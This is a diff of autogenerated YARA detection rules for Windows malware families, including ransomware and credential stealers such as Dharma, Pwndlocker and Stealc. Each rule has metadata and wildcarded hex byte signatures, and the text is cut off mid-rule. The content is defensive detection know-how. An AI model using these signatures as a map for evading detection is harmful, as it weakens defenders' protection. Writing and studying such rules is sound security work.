yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2947155f-bcbc-5d27-b13d-2d3d872fe248" + id = "0c88fb7f-6fc3-555b-938b-30689bfedd71" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.forest_tiger_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cova_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "baf01183ad62d9cfadf21ee10ad4e3a50b3d3f1c1788ceb5d46999aa5751e1b0" + logic_hash = "5acada90a087ad54806fe6fafb57fbcd69c3ce6e348c87bed79cabfe21474d32" score = 75 quality = 75 tags = "FILE" @@ -158955,34 +161617,34 @@ rule MALPEDIA_Win_Forest_Tiger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 833f01 0f94c0 84c0 7407 } - $sequence_1 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 } - $sequence_2 = { 833f01 0f94c0 84c0 7407 e8???????? } - $sequence_3 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 e8???????? } - $sequence_4 = { 6a0c 51 e8???????? 83c410 8b858cf8ffff 3bc3 746e } - $sequence_5 = { 4885c9 740c e8???????? 4c8935???????? 488d0ddf710200 ff15???????? } - $sequence_6 = { 741b 498d8c243a250000 458ac6 b213 e8???????? f7d8 1bdb } - $sequence_7 = { 51 e8???????? 83c410 81c6a8000000 8bc6 8d5002 668b08 } - $sequence_8 = { c20400 8b4508 c7462c00000080 c74644ffffffff 85c0 7403 894644 } - $sequence_9 = { 7416 4883ffff 7410 8bcd e8???????? 488bcf ffd0 } + $sequence_0 = { 8b430c 8905???????? 8bd7 4c8d0558bbffff } + $sequence_1 = { eb7c 4c8d258e800000 488b0d???????? eb6c } + $sequence_2 = { 4881c354020000 83fe06 7298 488d8d70040000 baf80d0000 } + $sequence_3 = { 3d80000000 751d 4c8be6 448bfe 4839742450 7419 ff5500 } + $sequence_4 = { 4863ca 0fb7444b10 664189844898c90000 ffc2 } + $sequence_5 = { 488b0d???????? e9???????? 4c8d25a6800000 488b0d???????? } + $sequence_6 = { eb06 8d4257 418800 ffc2 49ffc0 83fa10 } + $sequence_7 = { e8???????? 482be0 488b05???????? 4833c4 48898510170000 488dbde0000000 } + $sequence_8 = { ff15???????? 488d1574260000 488bce 488905???????? ff15???????? } + $sequence_9 = { 41bc14030000 4c8d0520320000 488bcd 418bd4 } condition: - 7 of them and filesize <709632 + 7 of them and filesize <123904 } -rule MALPEDIA_Win_Avrecon_Auto : FILE +rule MALPEDIA_Win_Neutrino_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "554ca169-95af-5a89-9a56-ddcba6897449" + id = "b9eb1524-9975-578b-ab6d-93138480d1f6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avrecon_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neutrino_auto.yar#L1-L324" license_url = "N/A" - logic_hash = "9c9411fb28d3d6162f9e1c850b8f8c9dc5dad1f470c391d983f628f3870dd7ec" - score = 75 - quality = 75 + logic_hash = "b8cd6770a3479380c0f958a2776eccb26f589975e6ef7e101cff7469e248afc4" + score = 60 + quality = 43 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158994,32 +161656,55 @@ rule MALPEDIA_Win_Avrecon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 e8???????? 85c0 0f8577020000 8d8584fbffff 50 56 } - $sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc } - $sequence_2 = { 56 47 e8???????? 0fb7f0 663bf3 0f869b030000 } - $sequence_3 = { e8???????? 53 ff15???????? 8b35???????? 8d4554 50 0fb705???????? } - $sequence_4 = { e8???????? 83c410 5e c3 55 8bec 81ec04010000 } - $sequence_5 = { 50 6880000000 57 ff7508 ffd6 6a04 8d45f8 } - $sequence_6 = { 49 7524 50 a3???????? ff15???????? e8???????? } - $sequence_7 = { e8???????? 56 6a08 8d45d8 50 ff7508 c645d800 } - $sequence_8 = { 56 8bf8 ff15???????? 668bc7 5f 5e } - $sequence_9 = { 50 8d85c0f7ffff 50 e8???????? 8d85a8f7ffff 50 894534 } + $sequence_0 = { ff15???????? c1e010 50 ff15???????? } + $sequence_1 = { 50 6a0b 6a07 e8???????? } + $sequence_2 = { 50 6a05 6a03 e8???????? } + $sequence_3 = { 85c9 7439 8b550c 8955fc 8b45fc 0fbe08 85c9 } + $sequence_4 = { 0fbe02 85c0 7447 8b4df4 0fbe11 8b45fc 0fbe08 } + $sequence_5 = { 0404 0404 0404 0402 0202 0202 } + $sequence_6 = { 8b4d0c 894dfc 8b55f4 83c201 8955f4 ebaf 8b45f4 } + $sequence_7 = { 0404 0404 010404 0202 } + $sequence_8 = { 020402 0404 0404 0404 0404 0404 0403 } + $sequence_9 = { 51 0fb655e7 52 8b45e0 50 e8???????? } + $sequence_10 = { 0fbe08 85c9 741b 8b55fc 0fbe02 8b4df8 0fbe11 } + $sequence_11 = { 894dfc 8b55fc 0fbe02 85c0 750f 8b4d0c 894dfc } + $sequence_12 = { 6a00 ff15???????? 6880000000 ff15???????? } + $sequence_13 = { 010404 0202 020402 0404 } + $sequence_14 = { e9???????? 6a01 ff15???????? 85c0 } + $sequence_15 = { 52 ff15???????? 83f8ff 7504 32c0 eb02 b001 } + $sequence_16 = { 894d08 0fb6550c 83fa01 7509 8b4508 83c001 894508 } + $sequence_17 = { 7407 814a1800300000 f645fe01 0f8494020000 834a1801 8b45f4 } + $sequence_18 = { 6a1c 5b 8d4de0 51 50 895de0 ff15???????? } + $sequence_19 = { 8a00 ff45f4 8b7218 8ad8 c0eb06 885dfc } + $sequence_20 = { 7354 8b3b 0fb6f2 6a05 58 2bc6 8d1437 } + $sequence_21 = { 51 ff35???????? c7460480000000 ff15???????? 8906 } + $sequence_22 = { 33d2 81e100f0ffff eb08 3bc1 7409 8bd0 } + $sequence_23 = { f645fe02 740a 834a1804 8a03 884210 43 f645fe40 } + $sequence_24 = { 83c120 81fae00f0000 76ea 8b0d???????? 8908 a3???????? 5f } + $sequence_25 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc } + $sequence_26 = { 83c40c 6804010000 8d85f8fdffff 50 } + $sequence_27 = { 7507 68???????? eb05 68???????? 50 ff510c } + $sequence_28 = { 7522 be???????? ff15???????? 57 8906 ff15???????? 83c604 } + $sequence_29 = { 7412 68???????? 50 ff15???????? f7d8 1bc0 } + $sequence_30 = { 57 33ff 393d???????? 7522 be???????? } + $sequence_31 = { ff15???????? 50 ff15???????? 837dfc00 0f95c0 c9 } + $sequence_32 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <507904 } -rule MALPEDIA_Win_Pwndlocker_Auto : FILE +rule MALPEDIA_Win_Sphijacker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68fbdce5-97ba-5b4c-a728-8efe50c54b3b" + id = "02bebd5c-3234-51fc-b1c7-c2b759df0e10" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pwndlocker_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sphijacker_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "035ce763bc16632a928a77294057e290950a177cc8c2678dfab31b46c9b29c9e" + logic_hash = "b2eaf40d7ebf7c9c6d61e8db2a040734266a57e7998ddc628afd90d30231d5ef" score = 75 quality = 75 tags = "FILE" @@ -159033,32 +161718,32 @@ rule MALPEDIA_Win_Pwndlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a } - $sequence_1 = { 01d8 83c078 8b00 8d3403 8b4e18 } - $sequence_2 = { c1cf0d 01c7 ebf4 3b7df0 } - $sequence_3 = { ebf4 3b7df0 75e0 5a 8b7224 01de 31c0 } - $sequence_4 = { 31ff 31c0 fc ac 84c0 7407 } - $sequence_5 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a 8b7224 } - $sequence_6 = { 01de 31ff 31c0 fc } - $sequence_7 = { 668b044e 8b721c 01de 8b0486 } - $sequence_8 = { fc ac 84c0 7407 c1cf0d 01c7 ebf4 } - $sequence_9 = { 01da 56 e334 49 8d348a } + $sequence_0 = { 488b0d???????? 488d1d19080200 483bcb 740c } + $sequence_1 = { 8b7808 e9???????? 488b55c8 4c8d05cbb10100 } + $sequence_2 = { 4c8d056b740100 83e23f 488bcf 48c1f906 488d14d2 498b0cc8 8064d138fd } + $sequence_3 = { 7c68 488b4718 488b08 420fb70451 2500800000 7455 488b8360040000 } + $sequence_4 = { 488bd1 488bc1 48c1f806 4c8d05e4bd0100 83e23f 488d14d2 498b04c0 } + $sequence_5 = { 33d2 f20f100d???????? 41b8ee010000 66898dc8070000 } + $sequence_6 = { e8???????? 448ba560010000 8b4c2440 488d15d9e8feff 2b4c2444 41b826000000 894c2440 } + $sequence_7 = { c744242804000000 488d1585e10100 41b904000000 4889442420 4533c0 c7451088888888 ff15???????? } + $sequence_8 = { ff15???????? 488b4d18 4c8d4520 488d159ee00100 ff15???????? 488b4d20 } + $sequence_9 = { 8b4814 c1e90c 4184cd 740e 488b8360040000 4883780800 7419 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <808960 } -rule MALPEDIA_Win_Dharma_Auto : FILE +rule MALPEDIA_Win_Derusbi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e57e8a97-3ba4-55fc-8a7a-2d2cd02d04a4" + id = "7e17bc22-c095-50d8-a4c2-1bf339697e7b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dharma_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.derusbi_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "7cad44063f19785eb5f21218749fc586efdec21afeaf1b9147edb5d8331036bc" + logic_hash = "325459f5183ff3b300e1f181ae53b4a2cb1c12e04a563b27e6a394d452c11ac4" score = 75 quality = 75 tags = "FILE" @@ -159072,32 +161757,32 @@ rule MALPEDIA_Win_Dharma_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945e8 8b45ec 8b4808 8b55ec } - $sequence_1 = { 8b4824 8b5508 8b4218 8d0c48 51 68ff7f0000 } - $sequence_2 = { 68???????? 6a00 6a00 e8???????? eb0e 8b4dfc 51 } - $sequence_3 = { 8b45e4 034530 8945e4 8b4dfc 034d30 894dfc 6a06 } - $sequence_4 = { a1???????? 898574ffffff 6880000000 68???????? 8b8d74ffffff 51 68???????? } - $sequence_5 = { 8945fc 8b4d08 0fb711 d1fa 8955e0 8b45f8 c1e818 } - $sequence_6 = { 741a 8b5508 83c22c 8b4dfc 8b8108000100 } - $sequence_7 = { 8b0c85b8bf4000 81e10000ff00 33d1 8b45f4 } - $sequence_8 = { d1f8 8d4c0002 51 e8???????? 83c404 8b55ec 8b4a08 } - $sequence_9 = { 8b55f4 83c201 8955f4 eba3 8b45f8 50 e8???????? } + $sequence_0 = { 8b819c000000 8d4de8 51 8d4dec 51 ffb00c010000 c745e810000000 } + $sequence_1 = { 8d55ec e8???????? 8d4f08 56 8d55f3 e8???????? 59 } + $sequence_2 = { 8913 ff15???????? 83c40c e8???????? b301 57 ff15???????? } + $sequence_3 = { 33c5 8945f8 8b4508 66833800 53 56 57 } + $sequence_4 = { 8945f8 8b4508 56 57 50 8d8de4fbffff 899590f9ffff } + $sequence_5 = { 64a300000000 8b5d0c 8b4508 894c2414 89442418 85db 0f8457050000 } + $sequence_6 = { 50 ffd6 b903010000 2bc8 51 8d85ecfdffff 68???????? } + $sequence_7 = { 56 56 56 6a03 56 68???????? 6800040000 } + $sequence_8 = { ffd3 50 57 ffb5f8fbffff ff15???????? 83c410 85c0 } + $sequence_9 = { ffb5d4fdffff 898db8fdffff ffb5ecfdffff ffb5f0fdffff ff15???????? 3bc7 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE +rule MALPEDIA_Win_Expiro_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "05fc3e6a-bc1e-5e27-996e-6357de6a9e2c" + id = "9bf3ea51-503d-5f40-a69a-188866df3f7b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_bolid_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.expiro_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "938464f6c09d72401fc04aa41413a321a3c389b634663fb70512029f39441d8b" + logic_hash = "c555162dc1357feb9808816e071d9b9f76383f5167ecd985c2225c4cf3cc9bed" score = 75 quality = 75 tags = "FILE" @@ -159111,32 +161796,32 @@ rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 741e 8b4c240c 51 ff15???????? 56 68???????? e8???????? } - $sequence_1 = { e8???????? 8d8c24d4000000 c684242c02000004 51 8bcd e8???????? 8b15???????? } - $sequence_2 = { 8bcb e8???????? 85c0 0f84fa000000 8b550c 42 } - $sequence_3 = { 49 885c2454 51 68???????? 8d4c2444 } - $sequence_4 = { 83c40c 8b15???????? 8d4de4 52 } - $sequence_5 = { e8???????? 6a01 8d4c2440 c644245800 e8???????? 8b4c2460 } - $sequence_6 = { f3a4 8b35???????? 8d4c2410 51 6a26 52 89442420 } - $sequence_7 = { 8b458c 3bc3 7505 b8???????? } - $sequence_8 = { 50 ff5104 33db 6a01 } - $sequence_9 = { 53 880e 8bce e8???????? 8b15???????? 8d44245c } + $sequence_0 = { 33c9 6689147e 3bcd 5f 1bc0 5e } + $sequence_1 = { 52 e8???????? 83c404 33c0 668944244c 6a04 897c2464 } + $sequence_2 = { 0f848f000000 803d????????00 0f8582000000 803d????????00 7579 8d8c24cc010000 } + $sequence_3 = { 8b4d00 eb02 8bcd 8d3441 0fb703 } + $sequence_4 = { b8???????? 8d4c2414 e8???????? 8d442414 50 8d4c2434 51 } + $sequence_5 = { 7373 7373 7353 7373 13ea 02abd9737373 } + $sequence_6 = { bf5c000000 52 55 8d5fa5 33c0 897c241c } + $sequence_7 = { 0fb74208 f6c303 7409 8d04c5c6234100 eb23 f6c30c } + $sequence_8 = { 31733e 45 cf 7160 7373 7308 7373 } + $sequence_9 = { 7373 7377 7373 7373 7373 7373 93 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <3776512 } -rule MALPEDIA_Win_Moonwind_Auto : FILE +rule MALPEDIA_Win_Cmstar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "27c4684d-de1d-52d3-b498-3e41ed70b3fe" + id = "aaad9b46-b601-594d-9a0b-7ba351f67235" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moonwind_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cmstar_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "4c5abeb5054990236a95ce032241f8cb96582d9f2acb60b8ffe13b68b01f39ef" + logic_hash = "c5a1f8b6b909717cbba254781a42955dfe756a8fae37e256ff72ffa4cd43d897" score = 75 quality = 75 tags = "FILE" @@ -159150,34 +161835,40 @@ rule MALPEDIA_Win_Moonwind_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b11 83c104 c1ea08 881430 8a51fc 40 881430 } - $sequence_1 = { 8b5dfc 895de4 8b5de4 66c7030200 8b5dfc 83c308 895de4 } - $sequence_2 = { 53 e8???????? 83c404 8b5d08 8b1b 81c390000000 895dec } - $sequence_3 = { e8???????? 83c404 83c734 33d2 83c8ff 8917 885704 } - $sequence_4 = { b801000000 eb05 b800000000 85c0 0f842f000000 8b5d08 8b1b } - $sequence_5 = { bbdc090000 e8???????? 83c410 8945b8 8b5dbc 85db 7409 } - $sequence_6 = { ff75fc 6801000000 bb68010000 e8???????? 83c410 8945f0 68???????? } - $sequence_7 = { 8965f4 8b5d08 ff33 6801000000 ff75f8 ff15???????? } - $sequence_8 = { 50 e8???????? 8d7c2434 83c9ff 33c0 83c40c f2ae } - $sequence_9 = { dc25???????? dd5dc4 6801030080 6a00 682c000000 dd45c4 e8???????? } + $sequence_0 = { 836dfc10 ff75fc 8945e0 8b45dc 83c310 } + $sequence_1 = { 8b4dec c1e802 6a04 52 8d0481 50 e8???????? } + $sequence_2 = { ff75e0 ff30 e8???????? 8b4df8 } + $sequence_3 = { ff15???????? 8bc6 e9???????? 6a10 8d45d0 53 } + $sequence_4 = { ff15???????? 6a04 e8???????? be00040000 } + $sequence_5 = { 56 bb04010000 57 53 } + $sequence_6 = { ff15???????? 6a03 58 5f 5e 5b c9 } + $sequence_7 = { 85c0 7504 6a03 eb0d 803b4d } + $sequence_8 = { 81ce00ffffff 46 8a1c06 88542418 881c01 8b5c2418 } + $sequence_9 = { 8b2d???????? 8b44241c 8bc8 48 85c9 8944241c 7e65 } + $sequence_10 = { 5d 741c 8a41ff 3ac3 740b 3cff } + $sequence_11 = { 7505 a1???????? 50 ff15???????? eb17 } + $sequence_12 = { 8bf0 8d5601 52 e8???????? 83c404 8bf8 8d442414 } + $sequence_13 = { e9???????? 55 83f801 57 7532 } + $sequence_14 = { 50 ff15???????? 83f8ff 89442420 7507 33f6 e9???????? } + $sequence_15 = { 8b5c2408 55 8b6c2414 56 57 8b7c2418 8bcb } condition: - 7 of them and filesize <1417216 + 7 of them and filesize <4268032 } -rule MALPEDIA_Win_Magniber_Auto : FILE +rule MALPEDIA_Win_Redalpha_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "05f5671a-f33b-5211-a81c-43695f05ea5d" + id = "18d7b39f-1fe8-5b57-91e8-72bb40b0300f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magniber_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redalpha_auto.yar#L1-L286" license_url = "N/A" - logic_hash = "a03ae86175c535bb9d3d882302b08d3c7bb8579783b2000a5224d25eaa155af3" + logic_hash = "062f534aa7bc989cb92a0f507bdc74bdcfcc089d3142c94dc9dd9b9510e4dbdc" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -159189,37 +161880,53 @@ rule MALPEDIA_Win_Magniber_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 83c408 837dfc00 7502 eb31 6a00 } - $sequence_1 = { 8b45e8 50 ff15???????? 8b4df4 51 } - $sequence_2 = { c785a0fafffff0934000 c785a4fafffff8934000 c785a8faffff00944000 c785acfaffff08944000 } - $sequence_3 = { 50 8b4df4 51 ff15???????? 8b45f8 99 } - $sequence_4 = { 83c408 8b4dfc 8b55f8 6689044a } - $sequence_5 = { c7852cfbffff14954000 c78530fbffff1c954000 c78534fbffff24954000 c78538fbffff2c954000 c7853cfbffff34954000 c78540fbffff40954000 } - $sequence_6 = { 66894da4 ba2f000000 668955a6 b853000000 668945a8 b943000000 } - $sequence_7 = { 0f842e010000 660f57c0 660f1345b0 6a00 8d4df8 51 6a10 } - $sequence_8 = { f76e9f 32d8 2d7a350e78 95 } - $sequence_9 = { 4834b0 184026 e221 a1????????05eef081 e0f8 29aed0515fa6 8d4f0e } - $sequence_10 = { 56 18cb 52 fc 285f44 c1c70d 11fb } - $sequence_11 = { e8???????? 32cb 5a b3b1 } - $sequence_12 = { 4e4e54 70ac 52 f8 a6 6e } - $sequence_13 = { 29aed0515fa6 8d4f0e 7f4c c82cd1c6 1a32 b636 } - $sequence_14 = { 5a b3b1 3e6c 21746c2e 4834b0 184026 } + $sequence_0 = { e8???????? 83c40c c0e304 0fb6c3 50 } + $sequence_1 = { 8b3e 8bce e8???????? 8b4df8 } + $sequence_2 = { 4585c0 7417 0f1f4000 410fb602 4d8d5201 03c8 } + $sequence_3 = { 443bd3 7d0b 6645019489a40a0000 eb33 } + $sequence_4 = { 8b4004 c74408e840d24300 8b41e8 8b5004 } + $sequence_5 = { 8b3d???????? eb96 8b8b48010000 e8???????? 8bce e8???????? 8b7e04 } + $sequence_6 = { 8b3f ff750c 53 6aff } + $sequence_7 = { 8b3e 897df4 0fb607 0fb64f01 } + $sequence_8 = { 42803c0000 75f6 49ffc0 488d4f0d 488d542450 } + $sequence_9 = { e8???????? 488d043b 4d63c4 488d8dea020000 } + $sequence_10 = { 498d4505 894208 d3e5 ffcd 23dd } + $sequence_11 = { 488b4b10 488b5010 410fb60411 41880408 ff4328 ff4338 } + $sequence_12 = { 448d4858 e8???????? 85c0 7556 } + $sequence_13 = { 8b3e 8bcb d3e8 83e001 895d08 } + $sequence_14 = { 488d542458 4803d0 488bcb e8???????? } + $sequence_15 = { 8b3d???????? ffd7 ffb548f7ffff ffd7 } + $sequence_16 = { 50 e8???????? 83c418 c785f0fdffff00000000 8d85f0fdffff 50 6a0b } + $sequence_17 = { 0f8413050000 8b3c8d8c864000 85ff 755d 33c0 89859cf6ffff 89855cfcffff } + $sequence_18 = { c3 55 8bec 81ec04010000 56 68cf010040 6a00 } + $sequence_19 = { 8d7608 660fd60f 8d7f08 8b048d74e84000 } + $sequence_20 = { 50 8d45f4 64a300000000 683f000f00 } + $sequence_21 = { 897c2428 e8???????? 83c410 8d442424 50 } + $sequence_22 = { 50 e8???????? 6aff c645fc01 ff75dc } + $sequence_23 = { 8b5df4 8bf7 8b4b04 85c9 0f85f2000000 33c0 } + $sequence_24 = { 7605 e8???????? 8b4f14 8bf0 } + $sequence_25 = { e8???????? 83f801 7512 68d0070000 ff15???????? e8???????? eb39 } + $sequence_26 = { 7512 8b04bd30744100 807c302900 7504 } + $sequence_27 = { 8b8fbc000000 52 ff7730 8b01 ff5004 ff75ec } + $sequence_28 = { c1f806 83e13f 6bc930 53 56 8b048530744100 33db } + $sequence_29 = { 89b8bc000000 ff15???????? 894708 ff7518 8b4514 } + $sequence_30 = { 6bc830 894de0 8b049d581f4000 0fb6440828 83e001 7469 } condition: - 7 of them and filesize <117760 + 7 of them and filesize <606208 } -rule MALPEDIA_Win_Unidentified_100_Auto : FILE +rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef81c2e4-5fa3-571d-bebe-aeaf2bbd4859" + id = "4c9695e3-d96e-5f67-a0c2-424bcf596515" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_100_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_sphinx_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "144a60b0164255f58e6624e761b77d4aa80b8a589ef3259bf29c12a9ff5a78b0" + logic_hash = "c474cca5e98993ccd970de7e5648248c620e9abab23dec872f161292bb6b1fb0" score = 75 quality = 75 tags = "FILE" @@ -159233,32 +161940,38 @@ rule MALPEDIA_Win_Unidentified_100_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d9424f0030000 488b4c2448 e8???????? e9???????? 4c8d8c2490070000 4533c0 488d942470130000 } - $sequence_1 = { 4889442420 4c8d8c24e0020000 448b442458 8b54245c 8b4c2454 } - $sequence_2 = { 0f8dac000000 c644242000 eb0b 0fb6442420 fec0 88442420 0fb6442420 } - $sequence_3 = { 448bc3 488d1580860000 e8???????? 85c0 7429 } - $sequence_4 = { 488bf8 33c0 b9fe010000 f3aa 4c8b8c24b8060000 4c8b8424b0060000 488d156dfd0100 } - $sequence_5 = { eb1d 488d05a7690100 ffcb 488d0c9b 488d0cc8 ff15???????? ff0d???????? } - $sequence_6 = { 488d05a7690100 ffcb 488d0c9b 488d0cc8 ff15???????? } - $sequence_7 = { ffc0 8944243c 486344243c 483b442458 7320 486344243c } - $sequence_8 = { 33c0 b97a010000 f3aa 488d8424b0190000 488d0deee80100 } - $sequence_9 = { 488b842490030000 4889842490000000 48c7442458ffffffff 48ff442458 488b842490000000 488b4c2458 66833c4800 } + $sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 } + $sequence_1 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? } + $sequence_2 = { 50 e8???????? 83c410 c74604ffffffff 897508 } + $sequence_3 = { 50 e8???????? 83c430 85c0 7e0c } + $sequence_4 = { 52 52 8b6c2444 55 50 e8???????? 8944245c } + $sequence_5 = { 50 e8???????? 84c0 745f 8d442414 } + $sequence_6 = { 50 e8???????? 83c420 48 } + $sequence_7 = { 50 e8???????? 83c418 68???????? 68???????? } + $sequence_8 = { 01fc eb98 035e14 8ade } + $sequence_9 = { 010c02 3bf7 0f85f0f50000 e9???????? } + $sequence_10 = { 003b c09bdbe23ea11c 695600663ec700 de07 } + $sequence_11 = { 0303 50 ff550c 8b3e } + $sequence_12 = { 010d???????? 60 5a 98 } + $sequence_13 = { 020a 42 1af6 af } + $sequence_14 = { 0162c9 cf 0c06 3c3e } + $sequence_15 = { 0008 d7 9f b2d3 } condition: - 7 of them and filesize <372736 + 7 of them and filesize <3268608 } -rule MALPEDIA_Win_Dubrute_Auto : FILE +rule MALPEDIA_Win_Stealc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "91c95b88-1aba-547d-a2e7-1c5fddf4a9b5" + id = "539cf538-cfac-56e1-8a82-eaf8270c6c0b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dubrute_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealc_auto.yar#L1-L108" license_url = "N/A" - logic_hash = "96123f7850603b9e3ec4473b7e8755ea7a00903c8750eba6148228fb5b3de4ca" + logic_hash = "6bf18991e2a395daac8cbfec9f407668e110581410c7e2de7aedba9cee95d9f0" score = 75 quality = 75 tags = "FILE" @@ -159272,32 +161985,32 @@ rule MALPEDIA_Win_Dubrute_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d45dc dd5de4 50 c645fc0d ff15???????? 8d4df0 c645fc08 } - $sequence_1 = { 83c410 83f8ff 743b 85c0 741c 03f0 56 } - $sequence_2 = { 83e906 7426 49 741a 49 740e 49 } - $sequence_3 = { 7427 48 7413 48 48 7551 57 } - $sequence_4 = { 5e 5d c3 8b4c2408 81f9ff000000 7e1b 8b442404 } - $sequence_5 = { e8???????? 83c410 ff866c090000 5e c3 55 8bec } - $sequence_6 = { 7520 8b06 8b4018 8b00 ff30 e8???????? 6a06 } - $sequence_7 = { 57 53 ff15???????? 8b3d???????? 8325????????00 8b37 3bf7 } - $sequence_8 = { 56 53 68???????? e8???????? 